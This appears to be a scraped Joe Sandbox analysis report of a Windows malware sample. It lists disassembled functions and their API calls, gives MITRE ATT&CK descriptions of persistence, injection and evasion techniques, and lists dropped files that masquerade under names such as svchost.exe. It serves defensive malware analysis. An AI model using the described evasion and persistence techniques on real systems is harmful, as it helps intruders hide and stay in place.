Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c95f913305d500bfc32bbbbee7193a633c0b3a4e4670fac29b056f2bae1782f
Instruction ID: bb3e69d15d780de53330c5d6d72164c4e0a011380651103a9525379e83ea7078
Opcode Fuzzy Hash: 4c95f913305d500bfc32bbbbee7193a633c0b3a4e4670fac29b056f2bae1782f
Instruction Fuzzy Hash: 97F0123240431DBB8F125E91BC01DEF3B69AF09362F0084B6FD1555112C739DE25DBAA

Function 004011E0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,00000006), ref: 004011F7

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: FindResource
String ID:
API String ID: 1635176832-0
Opcode ID: a58b1a04dc1bea75977a2527b1b1ca33b918ea6efbe7517a5065409332ed68fe
Instruction ID: 6dc988b005b8fc30f393fd8110b3f372d9b25c0a2933f789efa7e0433c938865
Opcode Fuzzy Hash: a58b1a04dc1bea75977a2527b1b1ca33b918ea6efbe7517a5065409332ed68fe
Instruction Fuzzy Hash: 2ED0C2262000203AD111261A7C009BB739CCBC5B75F01803FF981E6250D2749C4391B1

Function 00405690 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,00000013,00000013,00000000), ref: 004056B0

Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: FileFindFirstFolderPathSpecial
String ID:
API String ID: 4139272456-0
Opcode ID: e16a5da9c176f5747fdebabd61ae748e4b25d777e391b108598e2ecd6b42360c
Instruction ID: b5141f72a04271b27f2cd416eb66c2580eae33dfd44c725751d1776040a00473
Opcode Fuzzy Hash: e16a5da9c176f5747fdebabd61ae748e4b25d777e391b108598e2ecd6b42360c
Instruction Fuzzy Hash: B7E092312083006AE324A710DC12FEB7B94EB44B10F40442DF5849A1C0DAB985448B8A

Function 0045FE1A Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ExchangeInterlocked
String ID:
API String ID: 367298776-0
Opcode ID: 2bc2abf03f5655f9ba68e80518b30cb0f363e765179325703fd4d0107c92acbe
Instruction ID: bc49aa0d4d948be67f9690471510b8ed3888739c125ddbc330b2db5705a8ca27
Opcode Fuzzy Hash: 2bc2abf03f5655f9ba68e80518b30cb0f363e765179325703fd4d0107c92acbe
Instruction Fuzzy Hash: 07E0DF35100A008FD321AF6D940899AB7E0EF89320312046FF451C7331CB3488018B06

Function 00454A37 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001307,?,?), ref: 00454A64

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fd5ad6ed7d118575d801198fe39bceee9a7f057f70ad30e4d98d39196487485f
Instruction ID: c409d0f2698309086833104a9a61d1fa4173a06d7f66be008a515749cb0ecf84
Opcode Fuzzy Hash: fd5ad6ed7d118575d801198fe39bceee9a7f057f70ad30e4d98d39196487485f
Instruction Fuzzy Hash: 82E07EB590020EAFCB41DFA8D94199E7BF8FB08304F108166F955E7351E770EA629FA1

Function 00456F8E Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(?,?,?,?), ref: 00456FB6

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 59faccf43a043a13470f99c3d54ef39fe2c79f88222e295741fce528b2289a15
Instruction ID: 5178b5a0b41d74c9b106dcd966956f425ffcdcf2aff4cd00589aa289ec05536c
Opcode Fuzzy Hash: 59faccf43a043a13470f99c3d54ef39fe2c79f88222e295741fce528b2289a15
Instruction Fuzzy Hash: B6E08C32614251AF8B28CF24A800D7B73A4BB84301B4A481FB84283121D725CC048756

Function 004597FA Relevance: 1.5, APIs: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

IsDialogMessageA.USER32(?,?), ref: 00459823

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: DialogMessage
String ID:
API String ID: 547518314-0
Opcode ID: 1ffd83f6f69bfcf00c757c45a5924acd9a7cd19483080faaa8b4761980219d67
Instruction ID: 950d9a05d3075b4753071b1ad27fd3419ca856100382ac3c2366567b47a6deba
Opcode Fuzzy Hash: 1ffd83f6f69bfcf00c757c45a5924acd9a7cd19483080faaa8b4761980219d67
Instruction Fuzzy Hash: 62E08C35104241DBCB156B58C808ACABBE6AF4A311B0189AAF48683632C7B59C94DB95

Function 004305A0 Relevance: 1.5, APIs: 1, Instructions: 15registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(00000000,?,00402F00), ref: 004305AC

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 74364db6edf65ac1cded7dca93091c5e8858f5bf4cced24a346546391798bd62
Instruction ID: c7aa091f4a726c5968189d3feb802f8af7120f8bec3dfa8e5ccd4f51a11cb400
Opcode Fuzzy Hash: 74364db6edf65ac1cded7dca93091c5e8858f5bf4cced24a346546391798bd62
Instruction Fuzzy Hash: A7C012311281214ADB709E7CB80478132D8AB58711F11056AF481C3240E264C8824694

Function 0045988B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,?), ref: 00459898

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
Instruction ID: ce08906d4c308bcf959607817f9718b1f7e877e17a9a83edb3ef6e712208b152
Opcode Fuzzy Hash: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
Instruction Fuzzy Hash: C9D0CA70210100DFCB80EF01DA88B11B7B1BF5034AF6088FAE6484A262DB339C57DF05

Function 00459941 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
Instruction ID: 422d110c87409b42cc3d40fc4940c954b3565e0feb40eec272749ef0314fdf92
Opcode Fuzzy Hash: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
Instruction Fuzzy Hash: 72D0CA74200200EFCB80DF00D848B22BBB1AF5030AF2088EEE6454A262DB338C97DF06

Function 00459905 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912

Memory Dump Source

Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_ .jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
Instruction ID: e981d7f3aa070d6dd922208303280657e88cd7f5e4e9c7b1544f0cb6238b2e4d
Opcode Fuzzy Hash: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
Instruction Fuzzy Hash: 03D0CA70200200EFCB40DF10E808B25B7B2BB9430AF2088EEE6000A26AD7338C17EF06

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report G3izWAY3Fa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\SysWOW64\033726\RCX773C.tmp

C:\Windows\SysWOW64\033726\svchost.exe

C:\Windows\SysWOW64\034031\RCX8B31.tmp

C:\Windows\SysWOW64\034031\svchost.exe

C:\Windows\SysWOW64\05CA35CC

C:\Windows\Temp\ .exe

C:\Windows\Temp\server.exe

C:\Windows\Temp\v5.exe

C:\Windows\XXXXXX05CA35CC\svchsot.exe

C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe

Windows Analysis Report
G3izWAY3Fa.exe

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

